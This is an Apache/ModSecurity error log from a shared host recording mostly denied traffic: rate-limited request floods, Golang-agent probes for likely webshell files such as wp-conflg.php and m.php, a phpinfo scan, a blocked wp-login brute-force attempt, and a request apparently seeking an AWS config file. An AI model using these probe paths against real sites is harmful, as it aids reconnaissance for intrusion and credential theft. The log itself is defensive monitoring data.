[Tue May 26 20:00:26.408873 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswC4wAAAHI"]
[Tue May 26 20:00:26.409719 2026] [security2:error] [pid 106517:tid 106721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugYZZc2DoU1lPnP1fbQAAAMs"]
[Tue May 26 20:00:26.414234 2026] [security2:error] [pid 106517:tid 106688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugYZZc2DoU1lPnP1fZAAAAKo"]
[Tue May 26 20:00:26.428881 2026] [security2:error] [pid 106517:tid 106661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1fLAAAAJA"]
[Tue May 26 20:00:26.429898 2026] [security2:error] [pid 106517:tid 106770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugYZZc2DoU1lPnP1fYwAAAPw"]
[Tue May 26 20:00:26.435374 2026] [security2:error] [pid 106517:tid 106663] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugYZZc2DoU1lPnP1fawAAAJI"]
[Tue May 26 20:00:26.438755 2026] [security2:error] [pid 106517:tid 106651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugYZZc2DoU1lPnP1fbwAAAIY"]
[Tue May 26 20:00:26.453931 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswC8AAAAGE"]
[Tue May 26 20:00:26.455332 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswC8gAAAF8"]
[Tue May 26 20:00:26.459578 2026] [security2:error] [pid 93576:tid 93765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswC6AAAADU"]
[Tue May 26 20:00:26.483605 2026] [security2:error] [pid 106517:tid 106724] [client 103.163.220.47:52285] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/m.php"] [unique_id "ahWugoZZc2DoU1lPnP1f1gAAAM4"]
[Tue May 26 20:00:26.757516 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWugmDRMqfxdEDkoswDXwAAAHk
[Tue May 26 20:00:26.758216 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugmDRMqfxdEDkoswDYAAAAFA
[Tue May 26 20:00:26.760725 2026] [qos:error] [pid 106517:tid 106660] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugoZZc2DoU1lPnP1gAwAAAI8
[Tue May 26 20:00:26.762867 2026] [qos:error] [pid 106517:tid 106725] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWugoZZc2DoU1lPnP1gBAAAAM8
[Tue May 26 20:00:26.764390 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugmDRMqfxdEDkoswDZwAAAFc
[Tue May 26 20:00:26.765314 2026] [qos:error] [pid 106517:tid 106725] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWugoZZc2DoU1lPnP1gCAAAAM8
[Tue May 26 20:00:26.765347 2026] [qos:error] [pid 106517:tid 106772] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWugoZZc2DoU1lPnP1gBwAAAP4
[Tue May 26 20:00:26.765439 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugmDRMqfxdEDkoswDaAAAAEg
[Tue May 26 20:00:26.769225 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWugmDRMqfxdEDkoswDagAAAFs
[Tue May 26 20:00:26.945290 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugmDRMqfxdEDkoswDbgAAACQ
[Tue May 26 20:00:26.947409 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:46670] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugmDRMqfxdEDkoswDbwAAAFY
[Tue May 26 20:00:26.950459 2026] [qos:error] [pid 106517:tid 106732] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugoZZc2DoU1lPnP1gEwAAANY
[Tue May 26 20:00:26.955874 2026] [qos:error] [pid 93576:tid 93824] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugmDRMqfxdEDkoswDcAAAAHA
[Tue May 26 20:00:26.959461 2026] [security2:error] [pid 93576:tid 93728] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWugmDRMqfxdEDkoswDbQAAED0"]
[Tue May 26 20:00:26.971902 2026] [security2:error] [pid 106517:tid 106774] [client 103.163.220.13:57563] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/tinymce/themes/about.php"] [unique_id "ahWugoZZc2DoU1lPnP1gFQAAAQA"]
[Tue May 26 20:00:27.056341 2026] [qos:error] [pid 106517:tid 106672] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWug4ZZc2DoU1lPnP1gGAAAAJs
[Tue May 26 20:00:27.275815 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswC9gAAADg"]
[Tue May 26 20:00:27.283284 2026] [security2:error] [pid 93576:tid 93775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswC8wAAAD8"]
[Tue May 26 20:00:27.285745 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswC9wAAAG4"]
[Tue May 26 20:00:27.288075 2026] [security2:error] [pid 106517:tid 106739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugYZZc2DoU1lPnP1fcAAAAN0"]
[Tue May 26 20:00:27.289405 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswC-gAAAEU"]
[Tue May 26 20:00:27.294180 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswC9AAAAAk"]
[Tue May 26 20:00:27.309151 2026] [security2:error] [pid 93576:tid 93750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswC_AAAACY"]
[Tue May 26 20:00:27.316264 2026] [security2:error] [pid 106517:tid 106743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugYZZc2DoU1lPnP1feAAAAOE"]
[Tue May 26 20:00:27.317138 2026] [security2:error] [pid 93576:tid 93834] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswC-AAAAHo"]
[Tue May 26 20:00:27.323712 2026] [security2:error] [pid 106517:tid 106658] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugYZZc2DoU1lPnP1ffAAAAI0"]
[Tue May 26 20:00:27.325049 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswC9QAAAGw"]
[Tue May 26 20:00:27.331074 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswDAwAAAAA"]
[Tue May 26 20:00:27.333994 2026] [security2:error] [pid 106517:tid 106734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugYZZc2DoU1lPnP1feQAAANg"]
[Tue May 26 20:00:27.342725 2026] [security2:error] [pid 106517:tid 106666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1fzwAAAJU"]
[Tue May 26 20:00:27.355888 2026] [security2:error] [pid 106517:tid 106720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugYZZc2DoU1lPnP1fggAAAMo"]
[Tue May 26 20:00:27.361246 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswDBQAAAG0"]
[Tue May 26 20:00:27.365350 2026] [security2:error] [pid 106517:tid 106713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1fwwAAAMM"]
[Tue May 26 20:00:27.369076 2026] [security2:error] [pid 93576:tid 93767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswDBAAAADc"]
[Tue May 26 20:00:27.369421 2026] [security2:error] [pid 106517:tid 106705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1fyAAAALs"]
[Tue May 26 20:00:27.381008 2026] [security2:error] [pid 106517:tid 106719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1fxwAAAMk"]
[Tue May 26 20:00:27.394544 2026] [security2:error] [pid 93576:tid 93814] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswDCAAAAGY"]
[Tue May 26 20:00:27.399005 2026] [security2:error] [pid 106517:tid 106768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1fxQAAAPo"]
[Tue May 26 20:00:27.405396 2026] [security2:error] [pid 106517:tid 106699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f0AAAALU"]
[Tue May 26 20:00:27.408316 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswDCQAAAEM"]
[Tue May 26 20:00:27.408664 2026] [security2:error] [pid 106517:tid 106704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f1wAAALo"]
[Tue May 26 20:00:27.409255 2026] [security2:error] [pid 106517:tid 106683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f3AAAAKU"]
[Tue May 26 20:00:27.425477 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f3QAAALM"]
[Tue May 26 20:00:27.425732 2026] [security2:error] [pid 106517:tid 106766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f2wAAAPg"]
[Tue May 26 20:00:27.426509 2026] [security2:error] [pid 106517:tid 106760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f0QAAAPI"]
[Tue May 26 20:00:27.429068 2026] [security2:error] [pid 106517:tid 106677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1fywAAAKA"]
[Tue May 26 20:00:27.429614 2026] [security2:error] [pid 106517:tid 106669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1fzgAAAJg"]
[Tue May 26 20:00:27.433566 2026] [security2:error] [pid 106517:tid 106670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f4AAAAJk"]
[Tue May 26 20:00:27.440196 2026] [security2:error] [pid 106517:tid 106710] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f4gAAAMA"]
[Tue May 26 20:00:27.472763 2026] [security2:error] [pid 93576:tid 93824] [client 103.163.220.27:48803] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/wp-conflg.php"] [unique_id "ahWug2DRMqfxdEDkoswDgQAAAHA"]
[Tue May 26 20:00:27.535019 2026] [security2:error] [pid 106517:tid 106659] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWug4ZZc2DoU1lPnP1gKAAAji8"], referer: https://www.ndequipments.com/aws.config.js
[Tue May 26 20:00:27.804757 2026] [security2:error] [pid 93576:tid 93596] [remote 45.148.10.62:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ndequipments.com"] [uri "/phpinfo.php"] [unique_id "ahWug2DRMqfxdEDkoswDkQAARRE"]
[Tue May 26 20:00:27.805013 2026] [security2:error] [pid 106517:tid 106527] [remote 222.165.190.235:44294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWug4ZZc2DoU1lPnP1gLgAAnwc"]
[Tue May 26 20:00:27.870268 2026] [security2:error] [pid 106517:tid 106668] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWug4ZZc2DoU1lPnP1gIQAAAJc"]
[Tue May 26 20:00:27.967278 2026] [security2:error] [pid 93576:tid 93713] [client 103.163.220.47:31141] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/a.php"] [unique_id "ahWug2DRMqfxdEDkoswDyAAAAAE"]
[Tue May 26 20:00:27.982342 2026] [qos:error] [pid 106517:tid 106714] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWug4ZZc2DoU1lPnP1gUgAAAMQ
[Tue May 26 20:00:27.982839 2026] [qos:error] [pid 106517:tid 106731] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWug4ZZc2DoU1lPnP1gUwAAANU
[Tue May 26 20:00:27.984586 2026] [qos:error] [pid 93576:tid 93824] [client 45.148.10.120:53524] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWug2DRMqfxdEDkoswD1wAAAHA
[Tue May 26 20:00:27.985008 2026] [qos:error] [pid 106517:tid 106706] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWug4ZZc2DoU1lPnP1gVQAAALw
[Tue May 26 20:00:27.986170 2026] [qos:error] [pid 106517:tid 106760] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWug4ZZc2DoU1lPnP1gVwAAAPI
[Tue May 26 20:00:27.989212 2026] [qos:error] [pid 93576:tid 93769] [client 45.148.10.120:57956] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWug2DRMqfxdEDkoswD2QAAADk
[Tue May 26 20:00:27.990250 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWug2DRMqfxdEDkoswD2gAAAEs
[Tue May 26 20:00:27.997080 2026] [qos:error] [pid 106517:tid 106778] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWug4ZZc2DoU1lPnP1gWAAAAQQ
[Tue May 26 20:00:27.997174 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWug2DRMqfxdEDkoswD2wAAAHE
[Tue May 26 20:00:27.997593 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWug2DRMqfxdEDkoswD3QAAAHw
[Tue May 26 20:00:27.997657 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWug2DRMqfxdEDkoswD3gAAAAQ
[Tue May 26 20:00:28.221589 2026] [qos:error] [pid 106517:tid 106716] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gXwAAAMY
[Tue May 26 20:00:28.225337 2026] [qos:error] [pid 106517:tid 106692] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gYQAAAK4
[Tue May 26 20:00:28.225912 2026] [qos:error] [pid 106517:tid 106658] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gYgAAAI0
[Tue May 26 20:00:28.227494 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:57956] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswD5gAAAEs
[Tue May 26 20:00:28.229358 2026] [qos:error] [pid 93576:tid 93769] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuhGDRMqfxdEDkoswD5wAAADk
[Tue May 26 20:00:28.231725 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswD6QAAAHI
